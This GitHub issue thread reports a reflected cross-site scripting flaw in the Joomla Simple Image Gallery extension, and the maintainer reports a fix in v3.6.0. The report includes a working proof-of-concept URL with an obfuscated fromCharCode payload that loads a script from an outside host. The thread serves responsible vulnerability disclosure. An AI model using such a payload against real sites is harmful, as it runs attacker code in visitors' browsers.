### ISSUE TITLE
Cross Site Scripting is possible by appending a parameter to the URL.

### ISSUE THREAD

**Issue by ChristianGrieger** [joomlaworks/simple-image-gallery#10]
Hey JoomlaWorks,

we requested a penetration test and scan for a web application we created for a customer and got informed that it is possible to do a cross site scripting attack:

You can verify it yourself on your website with this request:

`http://demo.joomlaworks.net/simple-image-gallery?%22%3Csvg/onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,34,47,47,110,115,100,46,108,105,47,120,46,106,115,34,59))%3E`

<img width="859" alt="bildschirmfoto 2018-01-29 um 10 02 14" src="https://user-images.githubusercontent.com/8712219/35501945-bc82fa88-04db-11e8-8370-7a55603eaa56.png">

We hope to hear from you soon.

**Comment by fevangelou** [comment]
Good catch, although extremely difficult to exploit as the only way for someone to click that URL would be to have a PDF printout of the given page and then click the created URL that would point to the gallery.

Resolved in v3.6.0 (just issued) by using Joomla's API to cleanup the current page URL.

To be honest, before I release the final v3.6.0 I'll probably change the whole layout overall as I wanted to have the thumbnails embedded in the print page in a simple grid, instead of just using a link back to the actual online gallery...

Thanks :)

**Comment by ChristianGrieger** [comment]
No problem ;)

Do you have any timeframe on the 3.6? I would love to patch all websites i am using it on.

Greetings,
Chris

**Comment by fevangelou** [comment]
Working on the updated grid for printouts right now, so I'll release the final update within the next couple of hours. The master output currently on the repo is sufficient if you don't care about these layout changes: https://github.com/joomlaworks/simple-image-gallery/archive/master.zip

**Comment by ChristianGrieger** [comment]
Thank you very much. Have a nice day.

**Comment by fevangelou** [comment]
Final version released: https://www.joomlaworks.net/blog/item/269-simple-image-gallery-free-v3-6-0-released-featuring-enhanced-print-previews-fixing-xss-vulnerability-related-to-print-page-output
